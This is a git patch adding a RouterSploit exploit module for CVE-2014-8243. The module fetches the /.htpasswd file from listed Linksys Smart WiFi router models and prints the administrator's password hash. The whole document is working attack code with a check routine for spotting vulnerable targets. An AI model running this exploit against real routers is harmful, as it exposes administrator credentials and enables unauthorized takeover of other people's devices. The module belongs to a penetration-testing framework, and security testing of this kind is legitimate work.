From d43200b680599d92a6fae96cd2e89acaa380cc75 Mon Sep 17 00:00:00 2001
From: Laurent Meirlaen <burner@live.be>
Date: Sun, 27 Nov 2016 21:28:18 +0100
Subject: [PATCH] Linksys SmartWiFi htpasswd disclosure

---
 .../linksys/smartwifi_password_disclosure.py  | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py

diff --git a/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py b/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
new file mode 100644
index 000000000..b6583ae46
--- /dev/null
+++ b/routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
@@ -0,0 +1,61 @@
+from routersploit import (
+    exploits,
+    mute,
+    validators,
+    http_request,
+    print_info,
+    print_success,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit Linksys SMART WiFi firmware
+    If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
+    """
+    __info__ = {
+        'name': '',
+        'authors': [
+            'Sijmen Ruwhof',  # vulnerability discovery
+            '0BuRner',  # routersploit module
+        ],
+        'description': '',
+        'references': [
+            'https://www.kb.cert.org/vuls/id/447516',
+            'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
+            'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243',
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243',
+        ],
+        'devices': [
+            'Linksys EA2700 < Ver.1.1.40 (Build 162751)',
+            'Linksys EA3500 < Ver.1.1.40 (Build 162464)',
+            'Linksys E4200v2 < Ver.2.1.41 (Build 162351)',
+            'Linksys EA4500 < Ver.2.1.41 (Build 162351)',
+            'Linksys EA6200 < Ver.1.1.41 (Build 162599)',
+            'Linksys EA6300 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6400 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6500 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6700 < Ver.1.1.40 (Build 160989)',
+            'Linksys EA6900 < Ver.1.1.42 (Build 161129)',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+
+    def run(self):
+        url = "{}:{}/.htpasswd".format(self.target, self.port)
+        response = http_request(method="GET", url=url)
+
+        print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
+        print_success("Hash found:", response.text)
+
+    @mute
+    def check(self):
+        url = "{}:{}/.htpasswd".format(self.target, self.port)
+        response = http_request(method="HEAD", url=url)
+
+        if response is not None and response.status_code == 200:
+            return True
+
+        return False